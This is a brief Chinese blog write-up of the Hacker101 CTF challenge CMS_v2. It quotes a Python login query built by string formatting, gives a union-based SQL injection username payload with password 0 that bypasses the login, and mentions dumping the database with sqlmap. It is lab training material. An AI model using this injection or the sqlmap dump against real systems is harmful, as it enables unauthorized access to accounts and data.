2018-12-10

作者: L3B1anc | 来源:发表于2018-12-10 15:42 被阅读0次

第三次作业
RNA-seq
书面表达中的文化交流活动2018-12-10
梦梦ScalersTalk第四轮朗读持续力训练Day4 2018
wpp的ScalersTalk第四轮新概念朗读持续力训练Day6
Echo的ScalersTalk第四轮新概念朗读持续力训练Day
Docker常用命令整理速查表
业绩是可再生资源吗？
荆的ScalersTalk第四轮新概念朗读持续力训练Day63
每日前端签到（第128天）

CMS_v2

https://ctf.hacker101.com/ctf/launch/3

Flag 1

if cur.execute('SELECT password FROM admins WHERE username=\'%s\'' % request.form['username'].replace('%', '%%')) == 0:

cur.execute:python执行数据库操作

数据库语句:

SELECT password FROM admins WHERE username=\'%s\'

查询password

字符处理

request.form['username'].replace('%', '%%')

用%%替代%处理username然后传入参数值

判断条件是

cur.execute == 0

username

admin'and '1'='2' union select 0 from admins

password

0

Flag 2

get--> post

Flag 3

flag1 是 password，但是username在哪里还没有找到

sqlmap直接把数据库dump出来，简单粗暴

网友评论

本文标题：2018-12-10

本文链接：https://www.haomeiwen.com/subject/sitdhqtx.html

延伸阅读

深度阅读

您也可以注册成为美文阅读网的作者，发表您的原创作品、分享您的心情！

2018-12-10

CMS_v2

Flag 1

Flag 2

Flag 3

相关文章

第三次作业

RNA-seq

书面表达中的文化交流活动2018-12-10

梦梦ScalersTalk第四轮朗读持续力训练Day4 2018

wpp的ScalersTalk第四轮新概念朗读持续力训练Day6

Echo的ScalersTalk第四轮新概念朗读持续力训练Day

Docker常用命令整理速查表

业绩是可再生资源吗？

荆的ScalersTalk第四轮新概念朗读持续力训练Day63

每日前端签到（第128天）

网友评论

延伸阅读

深度阅读

栏目导航

热点阅读